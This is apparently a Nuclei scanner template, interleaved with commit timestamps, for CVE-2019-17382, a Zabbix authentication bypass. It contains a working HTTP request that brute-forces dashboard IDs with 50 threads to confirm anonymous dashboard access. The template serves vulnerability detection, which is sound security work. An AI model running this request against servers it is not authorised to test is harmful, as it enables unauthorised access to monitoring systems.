2021-01-02 04:59:06 +00:00
id : CVE-2019-17382
2020-07-07 04:17:27 +00:00
info :
name : Zabbix Authentication Bypass
2021-06-09 12:20:56 +00:00
author : harshbothra_
2020-08-31 18:34:29 +00:00
severity : critical
2022-04-22 10:38:41 +00:00
description : An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report,
Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
reference :
- https://www.exploit-db.com/exploits/47467
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 9.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-17382
cwe-id : CWE-639
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,zabbix,fuzz,bypass,login
2020-07-07 04:17:27 +00:00
requests :
2021-08-22 18:09:33 +00:00
- raw :
2021-04-24 03:59:34 +00:00
- |
2021-04-26 14:35:45 +00:00
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
2021-04-24 03:59:34 +00:00
Host : {{Hostname}}
Accept-Language : en-US,en;q=0.9
2020-07-07 04:17:27 +00:00
2021-08-22 18:09:33 +00:00
payloads :
ids : helpers/wordlists/numbers.txt
2021-10-10 01:13:30 +00:00
2021-08-22 18:09:33 +00:00
threads : 50
2021-09-02 11:59:10 +00:00
stop-at-first-match : true
2020-07-07 06:26:01 +00:00
matchers-condition : and
2020-07-07 04:17:27 +00:00
matchers :
2021-10-10 01:13:30 +00:00
2020-07-07 04:17:27 +00:00
- type : status
status :
- 200
2021-10-10 01:13:30 +00:00
2020-07-07 04:17:27 +00:00
- type : word
words :
- "<title>Dashboard</title>"